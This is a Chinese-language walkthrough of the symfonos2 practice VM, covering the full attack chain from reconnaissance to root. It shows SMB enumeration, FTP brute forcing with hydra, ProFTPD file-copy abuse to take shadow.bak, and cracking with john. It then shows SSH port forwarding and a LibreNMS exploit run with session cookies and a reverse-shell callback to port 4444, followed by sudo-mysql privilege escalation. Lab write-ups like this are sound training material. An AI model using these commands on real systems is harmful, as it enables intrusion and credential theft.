从hash碰撞到ssh端口转发渗透内网:靶机练习之symfonos2
信息搜集nmap -sn 192.168.8.0/24nmap -sT --min-rate 10000 192.168.8.7 -p重点关注445和21端口一个smb一个ftp,这两个都是有关存储的nmap -sT -sC -sV -O 192.168.8.7 -p21,22,80,139,445 -oA portssmb渗透enum4linux 192.168.8.7 -e US有个匿名登录smbclient //192.168.8.7/anonymous有一个日志文件mget logs.txt泄露文件分析存储了一个shadow.bak密码文件到备份文件夹泄露了一个ftp用户名ftp渗透之前端口扫描的时候探测到了ftp的版本ftp爆破之前文件泄露中拿到了一个文件名尝试进行爆破,这个等待时间较长hydra -l aeolus -P /usr/share/wordlists/rockyou.txt -f ftp://192.168.8.7ps第一次打的时候爆破出来了第二次耗了两个小时才出来这个应该不是常规路径不推荐未授权文件复制漏洞利用有历史漏洞但是目录没有写入权限没有办法直接反弹shell尝试文件复制把shadow.bak文件复制到smb共享文件夹中ftp site cpfr /var/backups/shadow.bak 350 File or directory exists, ready for destination name ftp site cpto /home/aeolus/share/shadow.bak 250 Copy successful下载shadow文件hash碰撞john pass.hash --wordlist/usr/share/wordlists/rockyou.txt拿到第一个凭证aeolus$sergioteamo内网渗透ss -ntlp发现内网还有一个8080端口服务ssh内网端口转发ssh -L 8080:127.0.0.1:8080 aeolus192.168.8.7 -N -L 参数详解 格式-L [本地地址:]本地端口:目标地址:目标端口 -L 8080:127.0.0.1:8080 ↑ ↑ ↑ 本地端口 目标地址 目标端口 - 8080本地端口— 你本机监听 8080 端口 - 127.0.0.1目标地址— 这是相对于远程主机的地址即远程主机的 localhost - 8080目标端口— 远程主机上 127.0.0.1:8080 的服务端口 数据流向 你的电脑:8080 ──SSH加密隧道── 192.168.8.7 ── 192.168.8.7:8080 (本机服务) 当你访问 http://127.0.0.1:8080 时流量会被 SSH 加密后转发到 192.168.8.7然后由远程主机访问它自己的 127.0.0.1:8080。 典型使用场景 远程主机 192.168.8.7 上运行了一个只监听 localhost 的服务如 Web 管理面板、数据库、API 服务这个服务不对外网暴露。通过这条命令你可以安全地在你本地直接访问该服务就像它在本地运行一样。 -N 的作用 不加 -N 的话SSH 连接后会给你一个远程 shell。加上 -N 表示不执行远程命令连接建立后终端会挂起只维持隧道不打开 shell。适合单纯做端口转发时使用。发现是一个librenms服务librenms渗透尝试用刚才获取的凭证成功登录后台查找漏洞利用searchsploit librenms查看利用方式发现需要登录的cookieburp登录抓包拿到cookiepython2 47044.py http://127.0.0.1:8080/ PHPSESSIDsr2acfp9qithdfben944bgrmh6; XSRF-TOKENeyJpdiI6ImZJWUtCRjB2Q3AwM1UzNWJPTWJjbnc9PSIsInZhbHVlIjoiVzRzOHkzZ1wvUDNMcWticUl1REdGMDUxTmVqRTlGT2U0cCtFT1JZTTNkMFh5T0V5NWtOQTRyR291TkI5K1NXVDB1Ukoyb0pDQVUrZG1MQnBKaStcLzlkZz09IiwibWFjIjoiOTEzODY1ZTJlMjRhZGE0ODIzZWYwM2Y4YjE2MDNjMWU1MTMxNTBjNDFkMTE5NWRjOTVjM2QxNTVmMTMzMTg4ZiJ9; librenms_sessioneyJpdiI6IjF0OVZPSUtsOU5pSnNMMEl5eld2RWc9PSIsInZhbHVlIjoiOWoxSFM2cmV4Mm13S0pXRzd1RG55T1duc2srNEk0VGtrUDRqNlFKZmtyWVpLRlQ1Zk0zS2hlXC85RWNpd1wva0RVRThZdVJiazFZWTltRmpFeTdkeGJLUT09IiwibWFjIjoiZjM5ZTk5ZTQyOGRhNDEwNWZiNGYyMTc0ZjQyMjc3NmRkOTk0MGY1YmMyYzc2MDExMWEwN2U3ZmQxNWQ4YzM5YiJ9 192.168.8.11 4444启动msf配置参数成功拿到shellsudo提权sudo -l可以免密执行sudo权限的mysqlGTFOBINs提权成功提权补充一个兔子洞内网还有一个邮件服务,exim 4.89有一个本地提权漏洞似乎无法成功利用小结一下靶机整理难度不高主要是针对smb泄露文件展开两条思路进一步攻击一个是用户名aeolus去爆破一个是shadow备份文件和共享文件路径泄露通过proftpd文件复制漏洞拿到shadow备份文件进行hash碰撞后面的内网渗透ssh端口转发思路都非常流畅是一台很好的练手的靶机